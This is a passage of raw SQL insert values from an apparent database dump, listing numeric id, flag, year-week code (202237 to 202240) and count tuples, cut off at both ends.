'202237',1),(4741,1,'202237',1),(4747,1,'202237',1),(4802,1,'202237',1),(5076,1,'202237',1),(5080,1,'202237',1),(480,1,'202237',2),(1697,1,'202237',2),(1705,1,'202237',2),(1715,1,'202237',2),(1774,1,'202237',2),(2293,1,'202237',2),(2801,1,'202237',2),(2965,1,'202237',2),(3243,1,'202237',2),(3245,1,'202237',2),(3263,1,'202237',2),(3265,1,'202237',2),(3269,1,'202237',2),(3275,1,'202237',2),(3282,1,'202237',2),(3738,1,'202237',2),(4275,1,'202237',2),(4387,1,'202237',2),(4396,1,'202237',2),(4404,1,'202237',2),(4408,1,'202237',2),(4542,1,'202237',2),(4566,1,'202237',2),(4587,1,'202237',2),(4608,1,'202237',2),(4688,1,'202237',2),(4750,1,'202237',2),(4756,1,'202237',2),(4797,1,'202237',2),(4862,1,'202237',2),(4874,1,'202237',2),(110,1,'202237',3),(484,1,'202237',3),(487,1,'202237',3),(1592,1,'202237',3),(1695,1,'202237',3),(1718,1,'202237',3),(1734,1,'202237',3),(1743,1,'202237',3),(1749,1,'202237',3),(1751,1,'202237',3),(1768,1,'202237',3),(1770,1,'202237',3),(2178,1,'202237',3),(2252,1,'202237',3),(2609,1,'202237',3),(2617,1,'202237',3),(2658,1,'202237',3),(2964,1,'202237',3),(2991,1,'202237',3),(3004,1,'202237',3),(3041,1,'202237',3),(3045,1,'202237',3),(3079,1,'202237',3),(3096,1,'202237',3),(3097,1,'202237',3),(3240,1,'202237',3),(3247,1,'202237',3),(3253,1,'202237',3),(3259,1,'202237',3),(3307,1,'202237',3),(3438,1,'202237',3),(3531,1,'202237',3),(3727,1,'202237',3),(3735,1,'202237',3),(3774,1,'202237',3),(4363,1,'202237',3),(4373,1,'202237',3),(4377,1,'202237',3),(4382,1,'202237',3),(4432,1,'202237',3),(4448,1,'202237',3),(4551,1,'202237',3),(4591,1,'202237',3),(4668,1,'202237',3),(4681,1,'202237',3),(4712,1,'202237',3),(4759,1,'202237',3),(4768,1,'202237',3),(4858,1,'202237',3),(4866,1,'202237',3),(4878,1,'202237',3),(4888,1,'202237',3),(5024,1,'202237',3),(5042,1,'202237',3),(5046,1,'202237',3),(471,1,'202237',4),(478,1,'202237',4),(1590,1,'202237',4),(1604,1,'202237',4),(1701,1,'202237',4),(1707,1,'202237',4),(1709,1,'202237',4),(1711,1,'202237',4),(1713,1,'202237',4),(1732,1,'202237',4),(1780,1,'202237',4),(2150,1,'202237',4),(2152,1,'202237',4),(2704,1,'202237',4),(2993,1,'202237',4),(3083,1,'202237',4),(3087,1,'202237',4),(3267,1,'202237',4),(3271,1,'202237',4),(3278,1,'202237',4),(3280,1,'202237',4),(3285,1,'202237',4),(3287,1,'202237',4),(3290,1,'202237',4),(3430,1,'202237',4),(3489,1,'202237',4),(3534,1,'202237',4),(3714,1,'202237',4),(3724,1,'202237',4),(3752,1,'202237',4),(4301,1,'202237',4),(4332,1,'202237',4),(4341,1,'202237',4),(4357,1,'202237',4),(4424,1,'202237',4),(4428,1,'202237',4),(4436,1,'202237',4),(4444,1,'202237',4),(4454,1,'202237',4),(4556,1,'202237',4),(4648,1,'202237',4),(4753,1,'202237',4),(4765,1,'202237',4),(4776,1,'202237',4),(4792,1,'202237',4),(4870,1,'202237',4),(4883,1,'202237',4),(4897,1,'202237',4),(4977,1,'202237',4),(5020,1,'202237',4),(5067,1,'202237',4),(5071,1,'202237',4),(481,1,'202237',5),(482,1,'202237',5),(483,1,'202237',5),(1699,1,'202237',5),(1703,1,'202237',5),(1720,1,'202237',5),(1730,1,'202237',5),(1776,1,'202237',5),(1778,1,'202237',5),(2154,1,'202237',5),(2156,1,'202237',5),(2248,1,'202237',5),(2297,1,'202237',5),(2558,1,'202237',5),(2748,1,'202237',5),(2813,1,'202237',5),(2956,1,'202237',5),(2989,1,'202237',5),(3006,1,'202237',5),(3038,1,'202237',5),(3107,1,'202237',5),(3109,1,'202237',5),(3226,1,'202237',5),(3257,1,'202237',5),(3273,1,'202237',5),(3316,1,'202237',5),(3482,1,'202237',5),(3731,1,'202237',5),(3749,1,'202237',5),(4238,1,'202237',5),(4335,1,'202237',5),(4368,1,'202237',5),(4514,1,'202237',5),(4546,1,'202237',5),(4762,1,'202237',5),(4893,1,'202237',5),(5028,1,'202237',5),(5037,1,'202237',5),(5050,1,'202237',5),(5058,1,'202237',5),(468,1,'202237',6),(473,1,'202237',6),(476,1,'202237',6),(477,1,'202237',6),(486,1,'202237',6),(1606,1,'202237',6),(1737,1,'202237',6),(1772,1,'202237',6),(2063,1,'202237',6),(2165,1,'202237',6),(2457,1,'202237',6),(2911,1,'202237',6),(3072,1,'202237',6),(3090,1,'202237',6),(3104,1,'202237',6),(3124,1,'202237',6),(3261,1,'202237',6),(3479,1,'202237',6),(3486,1,'202237',6),(3746,1,'202237',6),(3771,1,'202237',6),(3777,1,'202237',6),(4416,1,'202237',6),(4517,1,'202237',6),(4524,1,'202237',6),(4976,1,'202237',6),(4980,1,'202237',6),(4988,1,'202237',6),(5033,1,'202237',6),(5054,1,'202237',6),(5062,1,'202237',6),(102,1,'202237',7),(470,1,'202237',7),(474,1,'202237',7),(488,1,'202237',7),(1588,1,'202237',7),(1726,1,'202237',7),(1741,1,'202237',7),(1745,1,'202237',7),(2161,1,'202237',7),(2751,1,'202237',7),(3005,1,'202237',7),(3063,1,'202237',7),(3102,1,'202237',7),(3297,1,'202237',7),(3498,1,'202237',7),(4326,1,'202237',7),(4329,1,'202237',7),(4529,1,'202237',7),(4612,1,'202237',7),(4663,1,'202237',7),(4706,1,'202237',7),(4744,1,'202237',7),(335,1,'202237',8),(472,1,'202237',8),(485,1,'202237',8),(1584,1,'202237',8),(1598,1,'202237',8),(1722,1,'202237',8),(1728,1,'202237',8),(2296,1,'202237',8),(2775,1,'202237',8),(2804,1,'202237',8),(4412,1,'202237',8),(4420,1,'202237',8),(4440,1,'202237',8),(4651,1,'202237',8),(4660,1,'202237',8),(4674,1,'202237',8),(4677,1,'202237',8),(4691,1,'202237',8),(4700,1,'202237',8),(4703,1,'202237',8),(4722,1,'202237',8),(469,1,'202237',9),(1739,1,'202237',9),(1766,1,'202237',9),(2159,1,'202237',9),(2309,1,'202237',9),(3742,1,'202237',9),(4323,1,'202237',9),(4400,1,'202237',9),(4645,1,'202237',9),(4657,1,'202237',9),(4685,1,'202237',9),(467,1,'202237',10),(1582,1,'202237',10),(1608,1,'202237',10),(1614,1,'202237',10),(2809,1,'202237',10),(3023,1,'202237',10),(3060,1,'202237',10),(3069,1,'202237',10),(3127,1,'202237',10),(3710,1,'202237',10),(3721,1,'202237',10),(4338,1,'202237',10),(4391,1,'202237',10),(4582,1,'202237',10),(4654,1,'202237',10),(4694,1,'202237',10),(4709,1,'202237',10),(4771,1,'202237',10),(108,1,'202237',11),(4520,1,'202237',11),(4697,1,'202237',11),(570,1,'202237',12),(1544,1,'202237',12),(4983,1,'202237',12),(74,1,'202237',13),(1724,1,'202237',13),(2503,1,'202237',13),(2769,1,'202237',13),(3027,1,'202237',13),(3066,1,'202237',13),(3117,1,'202237',13),(3313,1,'202237',13),(3764,1,'202237',13),(4930,1,'202237',13),(87,1,'202237',14),(1610,1,'202237',14),(84,1,'202237',15),(3034,1,'202237',15),(3030,1,'202237',16),(1602,1,'202237',17),(3781,1,'202237',17),(1596,1,'202237',18),(4457,1,'202237',18),(1594,1,'202237',19),(1600,1,'202237',19),(1612,1,'202237',19),(76,1,'202237',20),(4996,1,'202237',20),(72,1,'202237',23),(91,1,'202237',23),(68,1,'202237',29),(89,1,'202237',31),(2904,1,'202237',35),(1586,1,'202237',45),(80,1,'202237',84),(9,1,'202237',672),(110,1,'202238',1),(1697,1,'202238',2),(1699,1,'202238',2),(1720,1,'202238',2),(1726,1,'202238',2),(1730,1,'202238',2),(1772,1,'202238',2),(1701,1,'202238',3),(1705,1,'202238',3),(1711,1,'202238',3),(1734,1,'202238',3),(1741,1,'202238',3),(1745,1,'202238',3),(1747,1,'202238',3),(1770,1,'202238',3),(2063,1,'202238',3),(2154,1,'202238',3),(2156,1,'202238',3),(2165,1,'202238',3),(2751,1,'202238',3),(2993,1,'202238',3),(3240,1,'202238',3),(3247,1,'202238',3),(3259,1,'202238',3),(3273,1,'202238',3),(3727,1,'202238',3),(4391,1,'202238',3),(4651,1,'202238',3),(4663,1,'202238',3),(4691,1,'202238',3),(102,1,'202238',4),(482,1,'202238',4),(1695,1,'202238',4),(1707,1,'202238',4),(1713,1,'202238',4),(1732,1,'202238',4),(1737,1,'202238',4),(1739,1,'202238',4),(1751,1,'202238',4),(1768,1,'202238',4),(2178,1,'202238',4),(2775,1,'202238',4),(3072,1,'202238',4),(3079,1,'202238',4),(3087,1,'202238',4),(3090,1,'202238',4),(3096,1,'202238',4),(3104,1,'202238',4),(3107,1,'202238',4),(3109,1,'202238',4),(3251,1,'202238',4),(3263,1,'202238',4),(3267,1,'202238',4),(3269,1,'202238',4),(3275,1,'202238',4),(3285,1,'202238',4),(3287,1,'202238',4),(3290,1,'202238',4),(3486,1,'202238',4),(3541,1,'202238',4),(4275,1,'202238',4),(4301,1,'202238',4),(4329,1,'202238',4),(4363,1,'202238',4),(4368,1,'202238',4),(4382,1,'202238',4),(4546,1,'202238',4),(4582,1,'202238',4),(4648,1,'202238',4),(4657,1,'202238',4),(4674,1,'202238',4),(4703,1,'202238',4),(4744,1,'202238',4),(4750,1,'202238',4),(4753,1,'202238',4),(4759,1,'202238',4),(4797,1,'202238',4),(4858,1,'202238',4),(4862,1,'202238',4),(4866,1,'202238',4),(4870,1,'202238',4),(4893,1,'202238',4),(4977,1,'202238',4),(485,1,'202238',5),(1715,1,'202238',5),(1743,1,'202238',5),(1780,1,'202238',5),(1782,1,'202238',5),(2150,1,'202238',5),(2152,1,'202238',5),(2248,1,'202238',5),(2658,1,'202238',5),(2964,1,'202238',5),(2989,1,'202238',5),(3004,1,'202238',5),(3038,1,'202238',5),(3041,1,'202238',5),(3066,1,'202238',5),(3102,1,'202238',5),(3117,1,'202238',5),(3124,1,'202238',5),(3249,1,'202238',5),(3253,1,'202238',5),(3257,1,'202238',5),(3265,1,'202238',5),(3271,1,'202238',5),(3278,1,'202238',5),(3280,1,'202238',5),(3316,1,'202238',5),(3430,1,'202238',5),(3498,1,'202238',5),(3714,1,'202238',5),(3738,1,'202238',5),(3749,1,'202238',5),(4341,1,'202238',5),(4373,1,'202238',5),(4404,1,'202238',5),(4408,1,'202238',5),(4424,1,'202238',5),(4448,1,'202238',5),(4542,1,'202238',5),(4587,1,'202238',5),(4608,1,'202238',5),(4668,1,'202238',5),(4685,1,'202238',5),(4688,1,'202238',5),(4700,1,'202238',5),(4756,1,'202238',5),(473,1,'202238',6),(478,1,'202238',6),(483,1,'202238',6),(484,1,'202238',6),(1703,1,'202238',6),(1718,1,'202238',6),(1722,1,'202238',6),(1728,1,'202238',6),(1749,1,'202238',6),(1776,1,'202238',6),(1778,1,'202238',6),(2148,1,'202238',6),(2161,1,'202238',6),(2293,1,'202238',6),(2297,1,'202238',6),(2704,1,'202238',6),(2748,1,'202238',6),(2911,1,'202238',6),(2956,1,'202238',6),(2991,1,'202238',6),(3034,1,'202238',6),(3060,1,'202238',6),(3069,1,'202238',6),(3092,1,'202238',6),(3127,1,'202238',6),(3226,1,'202238',6),(3243,1,'202238',6),(3261,1,'202238',6),(3282,1,'202238',6),(3297,1,'202238',6),(3482,1,'202238',6),(3531,1,'202238',6),(3710,1,'202238',6),(3721,1,'202238',6),(3746,1,'202238',6),(3771,1,'202238',6),(3774,1,'202238',6),(3777,1,'202238',6),(4323,1,'202238',6),(4326,1,'202238',6),(4332,1,'202238',6),(4357,1,'202238',6),(4377,1,'202238',6),(4400,1,'202238',6),(4428,1,'202238',6),(4436,1,'202238',6),(4440,1,'202238',6),(4444,1,'202238',6),(4517,1,'202238',6),(4524,1,'202238',6),(4551,1,'202238',6),(4591,1,'202238',6),(4747,1,'202238',6),(4765,1,'202238',6),(4792,1,'202238',6),(4874,1,'202238',6),(4883,1,'202238',6),(4888,1,'202238',6),(4980,1,'202238',6),(5033,1,'202238',6),(471,1,'202238',7),(480,1,'202238',7),(488,1,'202238',7),(1604,1,'202238',7),(1709,1,'202238',7),(2159,1,'202238',7),(2252,1,'202238',7),(2558,1,'202238',7),(2617,1,'202238',7),(2804,1,'202238',7),(3005,1,'202238',7),(3023,1,'202238',7),(3027,1,'202238',7),(3030,1,'202238',7),(3063,1,'202238',7),(3229,1,'202238',7),(3313,1,'202238',7),(3479,1,'202238',7),(3489,1,'202238',7),(3735,1,'202238',7),(3752,1,'202238',7),(4238,1,'202238',7),(4387,1,'202238',7),(4396,1,'202238',7),(4416,1,'202238',7),(4454,1,'202238',7),(4529,1,'202238',7),(4556,1,'202238',7),(4612,1,'202238',7),(4654,1,'202238',7),(4677,1,'202238',7),(4681,1,'202238',7),(4706,1,'202238',7),(4722,1,'202238',7),(4741,1,'202238',7),(4762,1,'202238',7),(4768,1,'202238',7),(4771,1,'202238',7),(4878,1,'202238',7),(4897,1,'202238',7),(5024,1,'202238',7),(468,1,'202238',8),(477,1,'202238',8),(479,1,'202238',8),(486,1,'202238',8),(487,1,'202238',8),(1584,1,'202238',8),(1590,1,'202238',8),(1592,1,'202238',8),(1606,1,'202238',8),(1614,1,'202238',8),(1766,1,'202238',8),(2296,1,'202238',8),(2769,1,'202238',8),(2801,1,'202238',8),(2965,1,'202238',8),(3045,1,'202238',8),(3097,1,'202238',8),(3245,1,'202238',8),(3307,1,'202238',8),(3724,1,'202238',8),(3731,1,'202238',8),(3742,1,'202238',8),(4432,1,'202238',8),(4457,1,'202238',8),(4514,1,'202238',8),(4566,1,'202238',8),(4712,1,'202238',8),(4983,1,'202238',8),(4988,1,'202238',8),(5037,1,'202238',8),(5062,1,'202238',8),(335,1,'202238',9),(469,1,'202238',9),(476,1,'202238',9),(481,1,'202238',9),(1774,1,'202238',9),(2609,1,'202238',9),(3438,1,'202238',9),(4335,1,'202238',9),(4412,1,'202238',9),(4420,1,'202238',9),(4776,1,'202238',9),(474,1,'202238',10),(1612,1,'202238',10),(1724,1,'202238',10),(3534,1,'202238',10),(3781,1,'202238',10),(5020,1,'202238',10),(5028,1,'202238',10),(5042,1,'202238',10),(5076,1,'202238',10),(74,1,'202238',11),(1598,1,'202238',11),(2457,1,'202238',11),(4802,1,'202238',11),(4976,1,'202238',11),(5050,1,'202238',11),(5054,1,'202238',11),(84,1,'202238',12),(1588,1,'202238',12),(1608,1,'202238',12),(2809,1,'202238',12),(2813,1,'202238',12),(4697,1,'202238',12),(4996,1,'202238',12),(5067,1,'202238',12),(5137,1,'202238',12),(108,1,'202238',13),(470,1,'202238',13),(472,1,'202238',13),(1600,1,'202238',13),(3083,1,'202238',13),(4520,1,'202238',13),(4709,1,'202238',13),(5046,1,'202238',13),(5058,1,'202238',13),(570,1,'202238',14),(4338,1,'202238',14),(5071,1,'202238',14),(5122,1,'202238',14),(5125,1,'202238',14),(467,1,'202238',15),(1610,1,'202238',15),(2503,1,'202238',15),(3006,1,'202238',15),(4645,1,'202238',15),(4660,1,'202238',15),(4694,1,'202238',15),(72,1,'202238',16),(76,1,'202238',16),(1582,1,'202238',17),(5080,1,'202238',17),(5128,1,'202238',17),(5131,1,'202238',17),(5134,1,'202238',17),(87,1,'202238',18),(1596,1,'202238',19),(3764,1,'202238',20),(2309,1,'202238',21),(4930,1,'202238',21),(1602,1,'202238',22),(68,1,'202238',23),(1544,1,'202238',23),(1594,1,'202238',25),(2904,1,'202238',25),(89,1,'202238',26),(5101,1,'202238',26),(1586,1,'202238',32),(91,1,'202238',33),(80,1,'202238',64),(9,1,'202238',705),(3004,1,'202239',1),(4387,1,'202239',1),(4591,1,'202239',1),(4744,1,'202239',1),(1695,1,'202239',2),(1703,1,'202239',2),(1734,1,'202239',2),(2658,1,'202239',2),(3045,1,'202239',2),(3097,1,'202239',2),(3541,1,'202239',2),(3738,1,'202239',2),(3749,1,'202239',2),(4332,1,'202239',2),(4357,1,'202239',2),(4404,1,'202239',2),(4688,1,'202239',2),(4741,1,'202239',2),(4756,1,'202239',2),(4797,1,'202239',2),(482,1,'202239',3),(483,1,'202239',3),(1590,1,'202239',3),(1697,1,'202239',3),(1707,1,'202239',3),(1718,1,'202239',3),(1720,1,'202239',3),(1730,1,'202239',3),(1768,1,'202239',3),(1780,1,'202239',3),(2063,1,'202239',3),(2148,1,'202239',3),(2156,1,'202239',3),(2161,1,'202239',3),(2293,1,'202239',3),(2993,1,'202239',3),(3092,1,'202239',3),(3104,1,'202239',3),(3109,1,'202239',3),(3249,1,'202239',3),(3265,1,'202239',3),(3269,1,'202239',3),(3271,1,'202239',3),(3273,1,'202239',3),(3438,1,'202239',3),(3742,1,'202239',3),(3771,1,'202239',3),(4363,1,'202239',3),(4382,1,'202239',3),(4408,1,'202239',3),(4424,1,'202239',3),(4432,1,'202239',3),(4440,1,'202239',3),(4454,1,'202239',3),(4608,1,'202239',3),(4612,1,'202239',3),(4648,1,'202239',3),(4657,1,'202239',3),(4668,1,'202239',3),(4674,1,'202239',3),(4677,1,'202239',3),(4691,1,'202239',3),(4703,1,'202239',3),(4706,1,'202239',3),(4712,1,'202239',3),(4722,1,'202239',3),(4765,1,'202239',3),(4792,1,'202239',3),(4802,1,'202239',3),(4862,1,'202239',3),(5024,1,'202239',3),(5037,1,'202239',3),(5042,1,'202239',3),(5050,1,'202239',3),(5054,1,'202239',3),(5062,1,'202239',3),(5067,1,'202239',3),(5076,1,'202239',3),(110,1,'202239',4),(484,1,'202239',4),(485,1,'202239',4),(488,1,'202239',4),(1699,1,'202239',4),(1715,1,'202239',4),(1774,1,'202239',4),(1778,1,'202239',4),(2154,1,'202239',4),(2248,1,'202239',4),(2911,1,'202239',4),(2956,1,'202239',4),(2964,1,'202239',4),(2989,1,'202239',4),(3034,1,'202239',4),(3079,1,'202239',4),(3096,1,'202239',4),(3107,1,'202239',4),(3124,1,'202239',4),(3226,1,'202239',4),(3253,1,'202239',4),(3282,1,'202239',4),(3287,1,'202239',4),(3290,1,'202239',4),(3430,1,'202239',4),(3534,1,'202239',4),(3721,1,'202239',4),(3731,1,'202239',4),(3752,1,'202239',4),(4335,1,'202239',4),(4681,1,'202239',4),(4700,1,'202239',4),(4750,1,'202239',4),(4753,1,'202239',4),(4762,1,'202239',4),(4866,1,'202239',4),(4870,1,'202239',4),(4874,1,'202239',4),(5028,1,'202239',4),(5046,1,'202239',4),(481,1,'202239',5),(570,1,'202239',5),(1713,1,'202239',5),(1737,1,'202239',5),(1751,1,'202239',5),(1766,1,'202239',5),(2152,1,'202239',5),(2178,1,'202239',5),(2558,1,'202239',5),(2813,1,'202239',5),(2965,1,'202239',5),(3229,1,'202239',5),(3240,1,'202239',5),(3243,1,'202239',5),(3257,1,'202239',5),(3297,1,'202239',5),(3313,1,'202239',5),(3531,1,'202239',5),(3727,1,'202239',5),(3777,1,'202239',5),(4326,1,'202239',5),(4329,1,'202239',5),(4368,1,'202239',5),(4373,1,'202239',5),(4377,1,'202239',5),(4396,1,'202239',5),(4400,1,'202239',5),(4416,1,'202239',5),(4420,1,'202239',5),(4428,1,'202239',5),(4448,1,'202239',5),(4566,1,'202239',5),(4587,1,'202239',5),(4651,1,'202239',5),(4654,1,'202239',5),(4663,1,'202239',5),(4685,1,'202239',5),(4771,1,'202239',5),(4776,1,'202239',5),(4858,1,'202239',5),(4878,1,'202239',5),(4883,1,'202239',5),(4888,1,'202239',5),(4893,1,'202239',5),(4897,1,'202239',5),(4988,1,'202239',5),(5020,1,'202239',5),(5033,1,'202239',5),(5058,1,'202239',5),(5071,1,'202239',5),(5080,1,'202239',5),(102,1,'202239',6),(469,1,'202239',6),(478,1,'202239',6),(479,1,'202239',6),(480,1,'202239',6),(1701,1,'202239',6),(1732,1,'202239',6),(1749,1,'202239',6),(1770,1,'202239',6),(2457,1,'202239',6),(2751,1,'202239',6),(3027,1,'202239',6),(3069,1,'202239',6),(3072,1,'202239',6),(3127,1,'202239',6),(3247,1,'202239',6),(3259,1,'202239',6),(3280,1,'202239',6),(3285,1,'202239',6),(3307,1,'202239',6),(3482,1,'202239',6),(3486,1,'202239',6),(3489,1,'202239',6),(3498,1,'202239',6),(3724,1,'202239',6),(3735,1,'202239',6),(3746,1,'202239',6),(3774,1,'202239',6),(4238,1,'202239',6),(4341,1,'202239',6),(4391,1,'202239',6),(4514,1,'202239',6),(4517,1,'202239',6),(4582,1,'202239',6),(4747,1,'202239',6),(4759,1,'202239',6),(106,1,'202239',7),(471,1,'202239',7),(476,1,'202239',7),(477,1,'202239',7),(1705,1,'202239',7),(1711,1,'202239',7),(1743,1,'202239',7),(1772,1,'202239',7),(1782,1,'202239',7),(2252,1,'202239',7),(2296,1,'202239',7),(2297,1,'202239',7),(2748,1,'202239',7),(2801,1,'202239',7),(2809,1,'202239',7),(3023,1,'202239',7),(3117,1,'202239',7),(3245,1,'202239',7),(3261,1,'202239',7),(3714,1,'202239',7),(4444,1,'202239',7),(4529,1,'202239',7),(4977,1,'202239',7),(472,1,'202239',8),(1592,1,'202239',8),(1726,1,'202239',8),(1739,1,'202239',8),(1741,1,'202239',8),(1747,1,'202239',8),(1776,1,'202239',8),(2150,1,'202239',8),(2617,1,'202239',8),(2991,1,'202239',8),(3060,1,'202239',8),(3063,1,'202239',8),(3066,1,'202239',8),(3087,1,'202239',8),(3102,1,'202239',8),(3267,1,'202239',8),(3275,1,'202239',8),(4275,1,'202239',8),(4436,1,'202239',8),(4524,1,'202239',8),(4546,1,'202239',8),(4768,1,'202239',8),(4996,1,'202239',8),(470,1,'202239',9),(1584,1,'202239',9),(1588,1,'202239',9),(1608,1,'202239',9),(1745,1,'202239',9),(3005,1,'202239',9),(3041,1,'202239',9),(3251,1,'202239',9),(3278,1,'202239',9),(3316,1,'202239',9),(3781,1,'202239',9),(4323,1,'202239',9),(4412,1,'202239',9),(4551,1,'202239',9),(4976,1,'202239',9),(4983,1,'202239',9),(5128,1,'202239',9),(5140,1,'202239',9),(74,1,'202239',10),(467,1,'202239',10),(486,1,'202239',10),(487,1,'202239',10),(1598,1,'202239',10),(1602,1,'202239',10),(1606,1,'202239',10),(1724,1,'202239',10),(1728,1,'202239',10),(2309,1,'202239',10),(2704,1,'202239',10),(2769,1,'202239',10),(2804,1,'202239',10),(3090,1,'202239',10),(4645,1,'202239',10),(5101,1,'202239',10),(5134,1,'202239',10),(5137,1,'202239',10),(335,1,'202239',11),(1612,1,'202239',11),(1709,1,'202239',11),(2775,1,'202239',11),(3038,1,'202239',11),(3083,1,'202239',11),(3710,1,'202239',11),(473,1,'202239',12),(1600,1,'202239',12),(1614,1,'202239',12),(2159,1,'202239',12),(3479,1,'202239',12),(4301,1,'202239',12),(4520,1,'202239',12),(4556,1,'202239',12),(4694,1,'202239',12),(4980,1,'202239',12),(5131,1,'202239',12),(87,1,'202239',13),(468,1,'202239',13),(474,1,'202239',13),(4542,1,'202239',13),(4660,1,'202239',13),(4697,1,'202239',13),(4709,1,'202239',13),(5125,1,'202239',13),(84,1,'202239',14),(2503,1,'202239',14),(3263,1,'202239',14),(1596,1,'202239',15),(1604,1,'202239',15),(3006,1,'202239',15),(3030,1,'202239',15),(4457,1,'202239',15),(89,1,'202239',16),(108,1,'202239',16),(1544,1,'202239',16),(2165,1,'202239',16),(4930,1,'202239',16),(76,1,'202239',17),(5122,1,'202239',17),(1722,1,'202239',18),(2609,1,'202239',18),(4338,1,'202239',19),(1582,1,'202239',21),(1610,1,'202239',21),(91,1,'202239',22),(3764,1,'202239',24),(1594,1,'202239',25),(2904,1,'202239',25),(68,1,'202239',27),(1586,1,'202239',31),(72,1,'202239',32),(80,1,'202239',77),(9,1,'202239',688),(1592,1,'202240',1),(3226,1,'202240',1),(3280,1,'202240',1),(4408,1,'202240',1),(106,1,'202240',2),(1701,1,'202240',2),(1782,1,'202240',2),(2156,1,'202240',2),(2252,1,'202240',2),(2293,1,'202240',2),(2751,1,'202240',2),(2956,1,'202240',2),(2991,1,'202240',2),(3072,1,'202240',2),(3243,1,'202240',2),(3727,1,'202240',2),(3752,1,'202240',2),(4329,1,'202240',2),(4357,1,'202240',2),(4373,1,'202240',2),(4391,1,'202240',2),(4428,1,'202240',2),(4440,1,'202240',2),(4566,1,'202240',2),(4681,1,'202240',2),(4744,1,'202240',2),(4753,1,'202240',2),(4883,1,'202240',2),(4980,1,'202240',2),(5020,1,'202240',2),(5024,1,'202240',2),(1590,1,'202240',3),(1697,1,'202240',3),(1699,1,'202240',3),(1707,1,'202240',3),(1739,1,'202240',3),(1749,1,'202240',3),(1772,1,'202240',3),(2063,1,'202240',3),(2159,1,'202240',3),(2161,1,'202240',3),(2801,1,'202240',3),(2989,1,'202240',3),(3004,1,'202240',3),(3005,1,'202240',3),(3027,1,'202240',3),(3038,1,'202240',3),(3041,1,'202240',3),(3229,1,'202240',3),(3259,1,'202240',3),(3287,1,'202240',3),(3430,1,'202240',3),(3724,1,'202240',3),(3735,1,'202240',3),(4326,1,'202240',3),(4332,1,'202240',3),(4341,1,'202240',3),(4377,1,'202240',3),(4424,1,'202240',3),(4432,1,'202240',3),(4444,1,'202240',3),(4514,1,'202240',3),(4542,1,'202240',3),(4651,1,'202240',3),(4685,1,'202240',3),(4722,1,'202240',3),(4747,1,'202240',3),(4802,1,'202240',3),(4870,1,'202240',3),(4878,1,'202240',3),(4893,1,'202240',3),(4897,1,'202240',3),(5037,1,'202240',3),(5046,1,'202240',3),(5054,1,'202240',3),(473,1,'202240',4),(482,1,'202240',4),(483,1,'202240',4),(484,1,'202240',4),(1703,1,'202240',4),(1705,1,'202240',4),(1711,1,'202240',4),(1715,1,'202240',4),(1720,1,'202240',4),(1734,1,'202240',4),(1737,1,'202240',4),(1741,1,'202240',4),(1743,1,'202240',4),(1745,1,'202240',4),(1747,1,'202240',4),(1766,1,'202240',4),(1774,1,'202240',4),(1780,1,'202240',4),(2150,1,'202240',4),(2248,1,'202240',4),(2609,1,'202240',4),(2617,1,'202240',4),(2704,1,'202240',4),(2748,1,'202240',4),(2804,1,'202240',4),(2964,1,'202240',4),(3063,1,'202240',4),(3096,1,'202240',4),(3124,1,'202240',4),(3247,1,'202240',4),(3251,1,'202240',4),(3265,1,'202240',4),(3275,1,'202240',4),(3278,1,'202240',4),(3438,1,'202240',4),(3731,1,'202240',4),(3742,1,'202240',4),(3774,1,'202240',4),(4238,1,'202240',4),(4301,1,'202240',4),(4368,1,'202240',4),(4382,1,'202240',4),(4387,1,'202240',4),(4396,1,'202240',4),(4404,1,'202240',4),(4436,1,'202240',4),(4448,1,'202240',4),(4517,1,'202240',4),(4587,1,'202240',4),(4648,1,'202240',4),(4688,1,'202240',4),(4712,1,'202240',4),(4750,1,'202240',4),(4792,1,'202240',4),(4862,1,'202240',4),(4977,1,'202240',4),(5033,1,'202240',4),(5050,1,'202240',4),(5058,1,'202240',4),(5080,1,'202240',4),(102,1,'202240',5),(471,1,'202240',5),(476,1,'202240',5),(478,1,'202240',5),(479,1,'202240',5),(1695,1,'202240',5),(1713,1,'202240',5),(1732,1,'202240',5),(1751,1,'202240',5),(1768,1,'202240',5),(1776,1,'202240',5),(1778,1,'202240',5),(2965,1,'202240',5),(2993,1,'202240',5),(3034,1,'202240',5),(3092,1,'202240',5),(3097,1,'202240',5),(3240,1,'202240',5),(3245,1,'202240',5),(3269,1,'202240',5),(3273,1,'202240',5),(3282,1,'202240',5),(3285,1,'202240',5),(3290,1,'202240',5),(3297,1,'202240',5),(3307,1,'202240',5),(3541,1,'202240',5),(3710,1,'202240',5),(3714,1,'202240',5),(3738,1,'202240',5),(3746,1,'202240',5),(3771,1,'202240',5),(3777,1,'202240',5),(4275,1,'202240',5),(4323,1,'202240',5),(4335,1,'202240',5),(4420,1,'202240',5),(4454,1,'202240',5),(4546,1,'202240',5),(4551,1,'202240',5),(4582,1,'202240',5),(4591,1,'202240',5),(4668,1,'202240',5),(4691,1,'202240',5),(4741,1,'202240',5),(4858,1,'202240',5),(4866,1,'202240',5),(4988,1,'202240',5),(5042,1,'202240',5),(5067,1,'202240',5),(5128,1,'202240',5),(480,1,'202240',6),(481,1,'202240',6),(487,1,'202240',6),(488,1,'202240',6),(1709,1,'202240',6),(1718,1,'202240',6),(1724,1,'202240',6),(1770,1,'202240',6),(2152,1,'202240',6),(2457,1,'202240',6),(2809,1,'202240',6),(3023,1,'202240',6),(3104,1,'202240',6),(3127,1,'202240',6),(3249,1,'202240',6),(3253,1,'202240',6),(3257,1,'202240',6),(3267,1,'202240',6),(3316,1,'202240',6),(3482,1,'202240',6),(3489,1,'202240',6),(3498,1,'202240',6),(3531,1,'202240',6),(3534,1,'202240',6),(3721,1,'202240',6),(3749,1,'202240',6),(4400,1,'202240',6),(4416,1,'202240',6),(4556,1,'202240',6),(4608,1,'202240',6),(4657,1,'202240',6),(4674,1,'202240',6),(4677,1,'202240',6),(4768,1,'202240',6),(4797,1,'202240',6),(4888,1,'202240',6),(4976,1,'202240',6),(5028,1,'202240',6),(5062,1,'202240',6),(5076,1,'202240',6),(5122,1,'202240',6),(5140,1,'202240',6),(470,1,'202240',7),(474,1,'202240',7),(1614,1,'202240',7),(1726,1,'202240',7),(1730,1,'202240',7),(2165,1,'202240',7),(2178,1,'202240',7),(2558,1,'202240',7),(3045,1,'202240',7),(3069,1,'202240',7),(3079,1,'202240',7),(3083,1,'202240',7),(3090,1,'202240',7),(3109,1,'202240',7),(3117,1,'202240',7),(3261,1,'202240',7),(3263,1,'202240',7),(3313,1,'202240',7),(3486,1,'202240',7),(4524,1,'202240',7),(4529,1,'202240',7),(4612,1,'202240',7),(4663,1,'202240',7),(4700,1,'202240',7),(4709,1,'202240',7),(4759,1,'202240'